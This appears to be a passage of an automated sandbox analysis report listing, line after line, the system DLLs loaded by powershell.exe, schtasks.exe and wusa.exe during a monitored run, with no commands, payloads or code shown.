Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
